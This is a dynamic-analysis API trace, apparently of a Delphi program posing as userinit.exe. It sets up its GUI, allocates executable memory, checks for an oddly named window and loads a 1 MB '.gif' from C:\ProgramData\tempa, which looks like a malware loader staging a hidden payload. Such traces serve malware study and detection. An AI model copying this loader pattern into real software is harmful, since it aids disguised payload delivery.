[0097.043] GetStockObject (i=5) returned 0x1900015
[0097.043] GetStockObject (i=13) returned 0x18a002e
[0097.043] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0097.043] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0097.043] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0097.043] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0097.044] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0097.045] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0xef6cc, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0097.045] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0097.045] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0097.045] GetVersion () returned 0x1db10106
[0097.045] GetCurrentProcessId () returned 0xf7c
[0097.045] GlobalAddAtomA (lpString="Delphi00000F7C") returned 0xc150
[0097.045] GetCurrentThreadId () returned 0xf80
[0097.045] GlobalAddAtomA (lpString="ControlOfs0040000000000F80") returned 0xc14f
[0097.046] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000F80") returned 0xc162
[0097.046] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0097.046] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0097.046] GetSystemMetrics (nIndex=19) returned 1
[0097.066] GetSystemMetrics (nIndex=75) returned 1
[0097.066] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x581310, fWinIni=0x0 | out: pvParam=0x581310) returned 1
[0097.066] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0097.066] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0097.066] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x201f5
[0097.067] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0097.067] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0097.067] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0097.067] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x201f3
[0097.067] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x201f1
[0097.067] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x201ef
[0097.067] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x201ed
[0097.067] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x201eb
[0097.068] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x201e9
[0097.068] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0097.068] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0097.068] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0097.068] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0097.068] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0097.068] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0097.068] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0097.068] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0097.068] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0097.068] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0097.068] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0097.068] GetDC (hWnd=0x0) returned 0xe010895
[0097.068] GetDeviceCaps (hdc=0xe010895, index=90) returned 96
[0097.068] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0097.068] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0097.068] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x58155c) returned 1
[0097.069] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0xefa37, fWinIni=0x0 | out: pvParam=0xefa37) returned 1
[0097.069] CreateFontIndirectA (lplf=0xefa37) returned 0x150a0871
[0097.069] GetObjectA (in: h=0x150a0871, c=60, pv=0xef828 | out: pv=0xef828) returned 60
[0097.069] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0xef8e3, fWinIni=0x0 | out: pvParam=0xef8e3) returned 1
[0097.069] CreateFontIndirectA (lplf=0xef9bf) returned 0x5b0a0881
[0097.069] GetObjectA (in: h=0x5b0a0881, c=60, pv=0xef828 | out: pv=0xef828) returned 60
[0097.069] CreateFontIndirectA (lplf=0xef983) returned 0x150a0872
[0097.069] GetObjectA (in: h=0x150a0872, c=60, pv=0xef828 | out: pv=0xef828) returned 60
[0097.069] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0097.069] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0xef997, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0097.069] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0xef997 | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0097.069] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x70000
[0097.070] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0xef94c | out: lpWndClass=0xef94c) returned 0
[0097.070] RegisterClassA (lpWndClass=0x451c88) returned 0x20c164
[0097.070] GetSystemMetrics (nIndex=0) returned 1440
[0097.070] GetSystemMetrics (nIndex=1) returned 900
[0097.070] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x201e8
[0097.073] SetWindowLongA (hWnd=0x201e8, nIndex=-4, dwNewLong=462831) returned 4219500
[0097.074] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0097.074] SendMessageA (hWnd=0x201e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0097.074] DefWindowProcA (hWnd=0x201e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0097.084] DefWindowProcA (hWnd=0x201e8, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x201d1
[0097.085] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0097.085] SetClassLongA (hWnd=0x201e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0097.085] GetSystemMenu (hWnd=0x201e8, bRevert=0) returned 0x201cb
[0097.087] DeleteMenu (hMenu=0x201cb, uPosition=0xf030, uFlags=0x0) returned 1
[0097.087] DeleteMenu (hMenu=0x201cb, uPosition=0xf000, uFlags=0x0) returned 1
[0097.087] DeleteMenu (hMenu=0x201cb, uPosition=0xf010, uFlags=0x0) returned 1
[0097.136] GetKeyboardLayoutList (in: nBuff=64, lpList=0xef918 | out: lpList=0xef918) returned 1
[0097.137] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0097.137] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0097.137] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6ced0000
[0097.137] GetProcAddress (hModule=0x6ced0000, lpProcName="InitializeFlatSB") returned 0x6cf0266f
[0097.137] GetProcAddress (hModule=0x6ced0000, lpProcName="UninitializeFlatSB") returned 0x6cf02542
[0097.137] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollProp") returned 0x6cf01d29
[0097.138] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollProp") returned 0x6cf0238d
[0097.138] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cf020c9
[0097.138] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cf01fdb
[0097.138] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollRange") returned 0x6cf01e8d
[0097.138] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cf01f0f
[0097.138] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollPos") returned 0x6cf01ccd
[0097.138] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollPos") returned 0x6cf0216d
[0097.138] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cf022be
[0097.138] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollRange") returned 0x6cf021e2
[0097.138] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0097.138] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0097.138] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0097.138] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0097.138] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0097.138] GetCurrentThreadId () returned 0xf80
[0097.138] GlobalAddAtomA (lpString="WndProcPtr0040000000000F80") returned 0xc14b
[0097.139] VirtualAlloc (lpAddress=0x584000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x584000
[0097.139] ShowWindow (hWnd=0x201e8, nCmdShow=0) returned 0
[0097.139] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0097.139] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0097.139] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0xef698*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xef698*=0) returned 0x0
[0097.139] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0xef690*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xef690*=0) returned 0x0
[0097.139] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0xef690*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xef690*=0) returned 0x10be00
[0097.140] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0xef690*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xef690*=0) returned 0x0
[0097.140] GlobalLock (hMem=0x370004) returned 0xd20020
[0097.140] ReadFile (in: hFile=0x98, lpBuffer=0xd20020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0xef6ac, lpOverlapped=0x0 | out: lpBuffer=0xd20020*, lpNumberOfBytesRead=0xef6ac*=0x10be00, lpOverlapped=0x0) returned 1
[0097.163] CloseHandle (hObject=0x98) returned 1
[0097.164] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.164] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.164] GlobalUnlock (hMem=0x37000c) returned 0
[0097.164] GlobalReAlloc (hMem=0x37000c, dwBytes=0x4000, uFlags=0x2) returned 0x37000c
[0097.165] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.165] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.165] GlobalUnlock (hMem=0x37000c) returned 0
[0097.165] GlobalReAlloc (hMem=0x37000c, dwBytes=0x6000, uFlags=0x2) returned 0x37000c
[0097.166] GlobalLock (hMem=0x37000c) returned 0x28a820
[0097.166] GlobalHandle (pMem=0x28a820) returned 0x37000c
[0097.166] GlobalUnlock (hMem=0x37000c) returned 0
[0097.166] GlobalReAlloc (hMem=0x37000c, dwBytes=0x8000, uFlags=0x2) returned 0x37000c
[0097.167] GlobalLock (hMem=0x37000c) returned 0x290830
[0097.167] GlobalHandle (pMem=0x290830) returned 0x37000c
[0097.167] GlobalUnlock (hMem=0x37000c) returned 0
[0097.167] GlobalReAlloc (hMem=0x37000c, dwBytes=0xa000, uFlags=0x2) returned 0x37000c
[0097.167] GlobalLock (hMem=0x37000c) returned 0x290830
[0097.168] GlobalHandle (pMem=0x290830) returned 0x37000c
[0097.168] GlobalUnlock (hMem=0x37000c) returned 0
[0097.168] GlobalReAlloc (hMem=0x37000c, dwBytes=0xc000, uFlags=0x2) returned 0x37000c
[0097.168] GlobalLock (hMem=0x37000c) returned 0x29a840
[0097.169] GlobalHandle (pMem=0x29a840) returned 0x37000c
[0097.169] GlobalUnlock (hMem=0x37000c) returned 0
[0097.169] GlobalReAlloc (hMem=0x37000c, dwBytes=0xe000, uFlags=0x2) returned 0x37000c
[0097.169] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.169] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.170] GlobalUnlock (hMem=0x37000c) returned 0
[0097.170] GlobalReAlloc (hMem=0x37000c, dwBytes=0x10000, uFlags=0x2) returned 0x37000c
[0097.170] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.170] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.170] GlobalUnlock (hMem=0x37000c) returned 0
[0097.170] GlobalReAlloc (hMem=0x37000c, dwBytes=0x12000, uFlags=0x2) returned 0x37000c
[0097.170] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.170] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.171] GlobalUnlock (hMem=0x37000c) returned 0
[0097.171] GlobalReAlloc (hMem=0x37000c, dwBytes=0x14000, uFlags=0x2) returned 0x37000c
[0097.171] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.171] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.171] GlobalUnlock (hMem=0x37000c) returned 0
[0097.171] GlobalReAlloc (hMem=0x37000c, dwBytes=0x16000, uFlags=0x2) returned 0x37000c
[0097.171] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.171] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.171] GlobalUnlock (hMem=0x37000c) returned 0
[0097.172] GlobalReAlloc (hMem=0x37000c, dwBytes=0x18000, uFlags=0x2) returned 0x37000c
[0097.172] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.172] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.172] GlobalUnlock (hMem=0x37000c) returned 0
[0097.172] GlobalReAlloc (hMem=0x37000c, dwBytes=0x1a000, uFlags=0x2) returned 0x37000c
[0097.172] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.172] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.172] GlobalUnlock (hMem=0x37000c) returned 0
[0097.172] GlobalReAlloc (hMem=0x37000c, dwBytes=0x1c000, uFlags=0x2) returned 0x37000c
[0097.172] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.173] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.173] GlobalUnlock (hMem=0x37000c) returned 0
[0097.173] GlobalReAlloc (hMem=0x37000c, dwBytes=0x1e000, uFlags=0x2) returned 0x37000c
[0097.173] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.173] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.173] GlobalUnlock (hMem=0x37000c) returned 0
[0097.173] GlobalReAlloc (hMem=0x37000c, dwBytes=0x20000, uFlags=0x2) returned 0x37000c
[0097.173] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.174] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.174] GlobalUnlock (hMem=0x37000c) returned 0
[0097.174] GlobalReAlloc (hMem=0x37000c, dwBytes=0x22000, uFlags=0x2) returned 0x37000c
[0097.176] GlobalLock (hMem=0x37000c) returned 0x2a6820
[0097.176] GlobalHandle (pMem=0x2a6820) returned 0x37000c
[0097.176] GlobalUnlock (hMem=0x37000c) returned 0
[0097.176] GlobalReAlloc (hMem=0x37000c, dwBytes=0x24000, uFlags=0x2) returned 0x37000c
[0097.176] GlobalLock (hMem=0x37000c) returned 0x2a6820
[0097.177] GlobalHandle (pMem=0x2a6820) returned 0x37000c
[0097.177] GlobalUnlock (hMem=0x37000c) returned 0
[0097.177] GlobalReAlloc (hMem=0x37000c, dwBytes=0x26000, uFlags=0x2) returned 0x37000c
[0097.179] GlobalLock (hMem=0x37000c) returned 0x2ca830
[0097.179] GlobalHandle (pMem=0x2ca830) returned 0x37000c
[0097.179] GlobalUnlock (hMem=0x37000c) returned 0
[0097.179] GlobalReAlloc (hMem=0x37000c, dwBytes=0x28000, uFlags=0x2) returned 0x37000c
[0097.179] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.180] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.180] GlobalUnlock (hMem=0x37000c) returned 0
[0097.180] GlobalReAlloc (hMem=0x37000c, dwBytes=0x2a000, uFlags=0x2) returned 0x37000c
[0097.180] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.180] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.180] GlobalUnlock (hMem=0x37000c) returned 0
[0097.180] GlobalReAlloc (hMem=0x37000c, dwBytes=0x2c000, uFlags=0x2) returned 0x37000c
[0097.180] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.181] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.181] GlobalUnlock (hMem=0x37000c) returned 0
[0097.181] GlobalReAlloc (hMem=0x37000c, dwBytes=0x2e000, uFlags=0x2) returned 0x37000c
[0097.181] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.213] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.213] GlobalUnlock (hMem=0x37000c) returned 0
[0097.213] GlobalReAlloc (hMem=0x37000c, dwBytes=0x30000, uFlags=0x2) returned 0x37000c
[0097.213] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.213] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.213] GlobalUnlock (hMem=0x37000c) returned 0
[0097.213] GlobalReAlloc (hMem=0x37000c, dwBytes=0x32000, uFlags=0x2) returned 0x37000c
[0097.213] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.214] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.214] GlobalUnlock (hMem=0x37000c) returned 0
[0097.214] GlobalReAlloc (hMem=0x37000c, dwBytes=0x34000, uFlags=0x2) returned 0x37000c
[0097.214] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.214] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.214] GlobalUnlock (hMem=0x37000c) returned 0
[0097.214] GlobalReAlloc (hMem=0x37000c, dwBytes=0x36000, uFlags=0x2) returned 0x37000c
[0097.214] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.215] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.215] GlobalUnlock (hMem=0x37000c) returned 0
[0097.215] GlobalReAlloc (hMem=0x37000c, dwBytes=0x38000, uFlags=0x2) returned 0x37000c
[0097.215] GlobalLock (hMem=0x37000c) returned 0x286810
[0097.215] GlobalHandle (pMem=0x286810) returned 0x37000c
[0097.215] GlobalUnlock (hMem=0x37000c) returned 0
